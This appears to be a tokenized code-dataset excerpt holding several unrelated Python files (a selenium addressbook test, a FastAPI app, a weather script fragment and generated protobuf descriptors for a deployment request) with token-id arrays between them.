262,
28536,
2393,
9387,
351,
198,
2,
428,
670,
329,
3224,
1321,
5115,
6634,
9238,
13,
198,
2,
383,
7054,
37,
... | 2.603866 | 8,795 |
import unittest
from com.example.client.config.low_level_client_by_connection import ESLowLevelClientByConnection
from elasticsearch_dsl import Search
from elasticsearch_dsl.query import Q, MatchPhrase
| [
11748,
555,
715,
395,
198,
6738,
401,
13,
20688,
13,
16366,
13,
11250,
13,
9319,
62,
5715,
62,
16366,
62,
1525,
62,
38659,
1330,
34084,
322,
4971,
11792,
3886,
32048,
198,
6738,
27468,
12947,
62,
67,
6649,
1330,
11140,
198,
6738,
2746... | 3.642857 | 56 |
# -*- coding: utf-8 -*-
from selenium.webdriver.firefox.webdriver import WebDriver
from selenium.webdriver.common.action_chains import ActionChains
import time
success = True
wd = WebDriver()
wd.implicitly_wait(60)
try:
wd.get("http://localhost/addressbook/")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").clear()
wd.find_element_by_name("pass").send_keys("secret")
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").clear()
wd.find_element_by_name("user").send_keys("admin")
wd.find_element_by_css_selector("input[type=\"submit\"]").click()
wd.find_element_by_link_text("groups").click()
wd.find_element_by_name("new").click()
wd.find_element_by_name("group_name").click()
wd.find_element_by_name("group_name").clear()
wd.find_element_by_name("group_name").send_keys("new froup")
wd.find_element_by_name("group_header").click()
wd.find_element_by_name("group_header").clear()
wd.find_element_by_name("group_header").send_keys("new grope")
wd.find_element_by_name("group_footer").click()
wd.find_element_by_name("group_footer").clear()
wd.find_element_by_name("group_footer").send_keys("new grpi")
wd.find_element_by_name("submit").click()
wd.find_element_by_link_text("group page").click()
wd.find_element_by_link_text("Logout").click()
wd.find_element_by_name("user").click()
wd.find_element_by_name("user").send_keys("\\undefined")
wd.find_element_by_name("pass").click()
wd.find_element_by_name("pass").send_keys("\\undefined")
finally:
wd.quit()
if not success:
raise Exception("Test failed.")
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
6495,
12792,
13,
12384,
26230,
1330,
5313,
32103,
198,
6738,
384,
11925,
1505,
13,
12384,
26230,
13,
11321,
13,
2673,
62,
3... | 2.449339 | 681 |
# coding: utf-8
import unittest
import charset_normalizer.utils as unicode_utils
if __name__ == '__main__':
unittest.main()
| [
2,
19617,
25,
3384,
69,
12,
23,
201,
198,
11748,
555,
715,
395,
201,
198,
11748,
34534,
316,
62,
11265,
7509,
13,
26791,
355,
28000,
1098,
62,
26791,
201,
198,
201,
198,
201,
198,
201,
198,
361,
11593,
3672,
834,
6624,
705,
834,
1... | 2.355932 | 59 |
# Python imports
import cliFile
import mx.DateTime
import pg
import sys
import editclifile
import cliRecord
import numpy
# Connect to the WEPP database
mydb = pg.connect('wepp', 'iemdb', user='wepp')
# We call with args for the time we are interested in
if (len(sys.argv) == 4):
yyyy, mm, dd = int(sys.argv[1]), int(sys.argv[2]), int(sys.argv[3])
ts = mx.DateTime.DateTime(yyyy, mm, dd)
insertJobQueue = 0
elif len(sys.argv) == 2:
ts = mx.DateTime.now() + mx.DateTime.RelativeDateTime(days=-1, hour=0, minute=0)
insertJobQueue = 0
else:
ts = mx.DateTime.now() + mx.DateTime.RelativeDateTime(days=-1, hour=0, minute=0)
insertJobQueue = 1
# Globals
times = [0]*96
points = 23182
data = [0]*points
for i in range(points):
data[i] = [0]*96
cl = {}
clh = {}
#
main()
| [
2,
11361,
17944,
198,
11748,
537,
72,
8979,
198,
11748,
285,
87,
13,
10430,
7575,
198,
11748,
23241,
198,
11748,
25064,
198,
11748,
4370,
565,
361,
576,
198,
11748,
537,
72,
23739,
198,
11748,
299,
32152,
198,
198,
2,
8113,
284,
262,
... | 2.417445 | 321 |
from fastapi import FastAPI
from starlette.middleware.cors import CORSMiddleware
from toponym_api.api.api_v1.api import router as api_router
from toponym_api.core.config import ALLOWED_HOSTS, API_V1_STR, PROJECT_NAME
from mangum import Mangum
app = FastAPI(
title=PROJECT_NAME,
# if not custom domain
# openapi_prefix="/Prod"
)
app.add_middleware(
CORSMiddleware,
allow_origins=ALLOWED_HOSTS,
allow_credentials=True,
allow_methods=["*"],
allow_headers=["*"],
)
app.include_router(api_router, prefix=API_V1_STR)
@app.get("/ping")
def pong():
"""
Sanity check.
This will let the user know that the service is operational.
And this path operation will:
* show a lifesign
"""
return {"ping": "pong!"}
handler = Mangum(app, enable_lifespan=False)
| [
6738,
3049,
15042,
1330,
12549,
17614,
198,
6738,
3491,
21348,
13,
27171,
1574,
13,
66,
669,
1330,
23929,
12310,
2509,
1574,
198,
6738,
1353,
5177,
62,
15042,
13,
15042,
13,
15042,
62,
85,
16,
13,
15042,
1330,
20264,
355,
40391,
62,
4... | 2.56962 | 316 |
from node import Node
from assembly import Assembly
| [
6738,
10139,
1330,
19081,
201,
198,
6738,
10474,
1330,
10006,
201,
198,
201,
198,
201,
198
] | 3.625 | 16 |
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: create.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from easy_flow_sdk.model.easy_flow import deploy_label_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2
from easy_flow_sdk.model.easy_flow import deploy_target_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2
from easy_flow_sdk.model.cmdb import cluster_info_pb2 as easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2
from easy_flow_sdk.model.easy_flow import version_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2
from easy_flow_sdk.model.easy_flow import target_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2
from easy_flow_sdk.model.easy_flow import package_info_pb2 as easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='create.proto',
package='deploy',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x0c\x63reate.proto\x12\x06\x64\x65ploy\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/deploy_label.proto\x1a\x31\x65\x61sy_flow_sdk/model/easy_flow/deploy_target.proto\x1a+easy_flow_sdk/model/cmdb/cluster_info.proto\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/version_info.proto\x1a/easy_flow_sdk/model/easy_flow/target_info.proto\x1a\x30\x65\x61sy_flow_sdk/model/easy_flow/package_info.proto\"\x93\x0c\n\rCreateRequest\x12\x12\n\nneedNotify\x18\x01 \x01(\x08\x12&\n\x06labels\x18\x02 \x01(\x0b\x32\x16.easy_flow.DeployLabel\x12\r\n\x05\x61ppId\x18\x03 \x01(\t\x12\x0f\n\x07\x61ppName\x18\x04 \x01(\t\x12\x11\n\tclusterId\x18\x05 \x01(\t\x12\x13\n\x0b\x63lusterType\x18\x06 \x01(\t\x12\x10\n\x08\x62\x61tchNum\x18\x07 \x01(\x05\x12\x15\n\rbatchInterval\x18\x08 \x01(\x05\x12.\n\x07\x62\x61tches\x18\t \x03(\x0b\x32\x1d.deploy.CreateRequest.Batches\x12\x12\n\nfailedStop\x18\n \x01(\x08\x12\x10\n\x08targetId\x18\x0b \x01(\t\x12\x12\n\ntargetName\x18\x0c \x01(\t\x12\x12\n\ninstanceId\x18\r \x01(\t\x12\"\n\x07\x63luster\x18\x0e \x01(\x0b\x32\x11.cmdb.ClusterInfo\x12\x38\n\x0cinstanceInfo\x18\x0f \x03(\x0b\x32\".deploy.CreateRequest.InstanceInfo\x12:\n\roperationInfo\x18\x10 \x03(\x0b\x32#.deploy.CreateRequest.OperationInfo\x12)\n\ntargetList\x18\x11 \x03(\x0b\x32\x15.easy_flow.TargetInfo\x12+\n\x0bpackageList\x18\x12 \x03(\x0b\x32\x16.easy_flow.PackageInfo\x12\x34\n\nconfigList\x18\x13 \x03(\x0b\x32 .deploy.CreateRequest.ConfigList\x12\x17\n\x0f\x63onfigPackageId\x18\x14 \x01(\t\x12\x34\n\nconfigDiff\x18\x15 \x03(\x0b\x32 .deploy.CreateRequest.ConfigDiff\x1a\x33\n\x07\x42\x61tches\x12(\n\x07targets\x18\x01 \x03(\x0b\x32\x17.easy_flow.DeployTarget\x1a\x8b\x01\n\x0cInstanceInfo\x12\x13\n\x0bversionName\x18\x01 \x01(\t\x12+\n\x0bversionInfo\x18\x02 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12\x11\n\tpackageId\x18\x03 \x01(\t\x12\x13\n\x0binstallPath\x18\x04 \x01(\t\x12\x11\n\tversionId\x18\x05 \x01(\t\x1a\xaa\x01\n\rOperationInfo\x12\x11\n\toperation\x18\x01 \x01(\t\x12-\n\rversionToInfo\x18\x02 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12/\n\x0fversionFromInfo\x18\x03 \x01(\x0b\x32\x16.easy_flow.VersionInfo\x12\x13\n\x0binstallPath\x18\x04 \x01(\t\x12\x11\n\tpackageId\x18\x05 \x01(\t\x1a\xee\x01\n\nConfigList\x12\r\n\x05hosts\x18\x01 \x03(\t\x12\x39\n\x07\x63onfigs\x18\x02 \x03(\x0b\x32(.deploy.CreateRequest.ConfigList.Configs\x1a\x95\x01\n\x07\x43onfigs\x12\x11\n\tpackageId\x18\x01 \x01(\t\x12=\n\x05items\x18\x02 \x03(\x0b\x32..deploy.CreateRequest.ConfigList.Configs.Items\x12\x13\n\x0binstallPath\x18\x03 \x01(\t\x1a#\n\x05Items\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0c\n\x04path\x18\x02 \x01(\t\x1a\xfe\x01\n\nConfigDiff\x12\r\n\x05hosts\x18\x01 \x03(\t\x12\x37\n\x06\x64\x65tail\x18\x02 \x03(\x0b\x32\'.deploy.CreateRequest.ConfigDiff.Detail\x1a\xa7\x01\n\x06\x44\x65tail\x12<\n\x05items\x18\x01 \x03(\x0b\x32-.deploy.CreateRequest.ConfigDiff.Detail.Items\x12\x11\n\tpackageId\x18\x02 \x01(\t\x12\x13\n\x0binstallPath\x18\x03 \x01(\t\x1a\x37\n\x05Items\x12\x0c\n\x04path\x18\x01 \x01(\t\x12\x0f\n\x07newName\x18\x02 \x01(\t\x12\x0f\n\x07oldName\x18\x03 \x01(\t\"n\n\x0e\x43reateResponse\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x0b\n\x03msg\x18\x02 \x01(\t\x12)\n\x04\x64\x61ta\x18\x03 \x01(\x0b\x32\x1b.deploy.CreateResponse.Data\x1a\x16\n\x04\x44\x61ta\x12\x0e\n\x06taskId\x18\x01 \x01(\t\"o\n\x15\x43reateResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12$\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32\x16.deploy.CreateResponseb\x06proto3')
,
dependencies=[easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__label__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_deploy__target__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_cmdb_dot_cluster__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_version__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_target__info__pb2.DESCRIPTOR,easy__flow__sdk_dot_model_dot_easy__flow_dot_package__info__pb2.DESCRIPTOR,])
_CREATEREQUEST_BATCHES = _descriptor.Descriptor(
name='Batches',
full_name='deploy.CreateRequest.Batches',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='targets', full_name='deploy.CreateRequest.Batches.targets', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1011,
serialized_end=1062,
)
_CREATEREQUEST_INSTANCEINFO = _descriptor.Descriptor(
name='InstanceInfo',
full_name='deploy.CreateRequest.InstanceInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='versionName', full_name='deploy.CreateRequest.InstanceInfo.versionName', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionInfo', full_name='deploy.CreateRequest.InstanceInfo.versionInfo', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.InstanceInfo.packageId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.InstanceInfo.installPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='deploy.CreateRequest.InstanceInfo.versionId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1065,
serialized_end=1204,
)
_CREATEREQUEST_OPERATIONINFO = _descriptor.Descriptor(
name='OperationInfo',
full_name='deploy.CreateRequest.OperationInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='operation', full_name='deploy.CreateRequest.OperationInfo.operation', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionToInfo', full_name='deploy.CreateRequest.OperationInfo.versionToInfo', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionFromInfo', full_name='deploy.CreateRequest.OperationInfo.versionFromInfo', index=2,
number=3, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.OperationInfo.installPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.OperationInfo.packageId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1207,
serialized_end=1377,
)
_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS = _descriptor.Descriptor(
name='Items',
full_name='deploy.CreateRequest.ConfigList.Configs.Items',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='deploy.CreateRequest.ConfigList.Configs.Items.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='path', full_name='deploy.CreateRequest.ConfigList.Configs.Items.path', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1583,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGLIST_CONFIGS = _descriptor.Descriptor(
name='Configs',
full_name='deploy.CreateRequest.ConfigList.Configs',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.ConfigList.Configs.packageId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='items', full_name='deploy.CreateRequest.ConfigList.Configs.items', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.ConfigList.Configs.installPath', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGLIST_CONFIGS_ITEMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1469,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGLIST = _descriptor.Descriptor(
name='ConfigList',
full_name='deploy.CreateRequest.ConfigList',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hosts', full_name='deploy.CreateRequest.ConfigList.hosts', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configs', full_name='deploy.CreateRequest.ConfigList.configs', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGLIST_CONFIGS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1380,
serialized_end=1618,
)
_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS = _descriptor.Descriptor(
name='Items',
full_name='deploy.CreateRequest.ConfigDiff.Detail.Items',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='path', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.path', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='newName', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.newName', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='oldName', full_name='deploy.CreateRequest.ConfigDiff.Detail.Items.oldName', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1820,
serialized_end=1875,
)
_CREATEREQUEST_CONFIGDIFF_DETAIL = _descriptor.Descriptor(
name='Detail',
full_name='deploy.CreateRequest.ConfigDiff.Detail',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='items', full_name='deploy.CreateRequest.ConfigDiff.Detail.items', index=0,
number=1, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='deploy.CreateRequest.ConfigDiff.Detail.packageId', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='installPath', full_name='deploy.CreateRequest.ConfigDiff.Detail.installPath', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGDIFF_DETAIL_ITEMS, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1708,
serialized_end=1875,
)
_CREATEREQUEST_CONFIGDIFF = _descriptor.Descriptor(
name='ConfigDiff',
full_name='deploy.CreateRequest.ConfigDiff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='hosts', full_name='deploy.CreateRequest.ConfigDiff.hosts', index=0,
number=1, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='detail', full_name='deploy.CreateRequest.ConfigDiff.detail', index=1,
number=2, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[_CREATEREQUEST_CONFIGDIFF_DETAIL, ],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1621,
serialized_end=1875,
)
_CREATEREQUEST = _descriptor.Descriptor(
name='CreateRequest',
full_name='deploy.CreateRequest',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='needNotify', full_name='deploy.CreateRequest.needNotify', index=0,
number=1, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='labels', full_name='deploy.CreateRequest.labels', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appId', full_name='deploy.CreateRequest.appId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='appName', full_name='deploy.CreateRequest.appName', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterId', full_name='deploy.CreateRequest.clusterId', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='clusterType', full_name='deploy.CreateRequest.clusterType', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchNum', full_name='deploy.CreateRequest.batchNum', index=6,
number=7, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batchInterval', full_name='deploy.CreateRequest.batchInterval', index=7,
number=8, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='batches', full_name='deploy.CreateRequest.batches', index=8,
number=9, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='failedStop', full_name='deploy.CreateRequest.failedStop', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetId', full_name='deploy.CreateRequest.targetId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetName', full_name='deploy.CreateRequest.targetName', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceId', full_name='deploy.CreateRequest.instanceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='cluster', full_name='deploy.CreateRequest.cluster', index=13,
number=14, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='instanceInfo', full_name='deploy.CreateRequest.instanceInfo', index=14,
number=15, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='operationInfo', full_name='deploy.CreateRequest.operationInfo', index=15,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='targetList', full_name='deploy.CreateRequest.targetList', index=16,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageList', full_name='deploy.CreateRequest.packageList', index=17,
number=18, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configList', full_name='deploy.CreateRequest.configList', index=18,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configPackageId', full_name='deploy.CreateRequest.configPackageId', index=19,
number=20, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='configDiff', full_name='deploy.CreateRequest.configDiff', index=20,
number=21, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
